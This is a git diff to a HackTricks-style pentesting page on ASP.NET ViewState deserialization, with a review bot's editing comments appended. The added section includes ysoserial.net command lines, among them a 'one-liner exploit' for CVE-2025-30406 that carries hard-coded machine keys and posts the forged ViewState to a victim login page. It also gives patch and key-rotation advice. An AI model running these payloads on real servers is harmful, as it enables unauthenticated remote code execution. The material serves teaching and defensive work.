diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index e7020f2a582..1d2efe9e0c2 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md 
@@ -237,8 +237,50 @@ curl "http://victim/page.aspx?__VIEWSTATE=" This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code. +## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys + +### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025) +Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits: + +```bash +ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \ + --validationkey= --validationalg=SHA1 \ + --decryptionkey= --decryptionalg=AES \ + --generator= --minify +``` + +Rotating static keys or switching to *AutoGenerate* keys in Web .config (``) mitigates this class of attacks. {{#ref}} + +{{#endref}} + +### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys +Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406). + +One-liner exploit: + +```bash +ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \ + --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \ + --validationalg=SHA1 \ + --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \ + --decryptionalg=AES --generator=24D41AAB --minify \ + | curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx +``` + +Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. 
{{#ref}} + + +{{#endref}} + ## References +- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) +- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) +- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) +- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets) +- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/) +- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/) +- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/) - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) 
@@ -250,4 +292,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin {{#include ../../banners/hacktricks-training.md}} -
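Review bot: In the first hunk (the new "2024-2025 Real-world Exploitation Scenarios" section), the first `ysoserial.exe` example passes empty values for `--validationkey=`, `--decryptionkey=` and `--generator=`, and the inline code following "Web .config" is empty, so the values the sentence refers to are missing; mark them as explicit placeholders such as `--validationkey=<VALIDATION_KEY>` and spell out `Web.config` together with the `<machineKey>` element the sentence is pointing at. The same paragraph mentions the `--islegacy` flag, but neither example uses it; either show the flag or drop the mention. Both `{{#ref}} ... {{#endref}}` blocks in this hunk carry no target and will render as broken cross-references; fill in the target page or remove them. In the References list, the three new entries for notsosecure, medium and soroush duplicate the bolded bare-URL entries kept immediately below them; delete the old bold entries so each source appears once. Finally, the mitigation sentence ("Rotating static keys or switching to *AutoGenerate* keys ...") would benefit from the caveat that rotating the `machineKey` invalidates ViewState already issued to clients and that `AutoGenerate` keys are per-machine, so they cannot be used where several web farm nodes must validate the same ViewState.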